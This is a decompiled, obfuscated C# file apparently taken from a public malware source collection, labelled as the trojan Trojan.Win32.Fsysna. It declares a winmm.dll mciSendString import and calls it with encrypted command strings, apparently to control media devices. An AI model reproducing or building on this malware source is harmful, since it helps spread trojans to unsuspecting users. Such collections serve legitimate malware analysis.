MalwareSourceCode/MSIL/Trojan/Win32/F/Trojan.Win32.Fsysna.deeq-bccdbf807edf4ae3f172c9e102415d19675fee38175dc7fe4f296402da8186a9/_0019/_001D.cs
2022-08-18 06:28:56 -05:00

31 lines
1019 B
C#
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

// Decompiled with JetBrains decompiler
// Type: .
// Assembly: MyApplication, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4C1CA376-1B35-4961-80E8-8029AD6B5A8B
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Fsysna.deeq-bccdbf807edf4ae3f172c9e102415d19675fee38175dc7fe4f296402da8186a9.exe
using \u0003;
using \u0005;
using \u0019;
using System;
using System.Runtime.InteropServices;
using System.Text;
namespace \u0019
{
internal static class \u001D
{
[NonSerialized]
internal static \u0002 \u0001;
[DllImport("winmm.dll", EntryPoint = "mciSendString")]
private static extern int \u0092([In] string obj0, [In] StringBuilder obj1, [In] int obj2, [In] IntPtr obj3);
public static void \u0093() => \u001D.\u0092(\u001D.\u0001(871), (StringBuilder) null, 0, IntPtr.Zero);
public static void \u0094() => \u001D.\u0092(\u001D.\u0001(900), (StringBuilder) null, 0, IntPtr.Zero);
static \u001D() => \u0004.\u007F();
}
}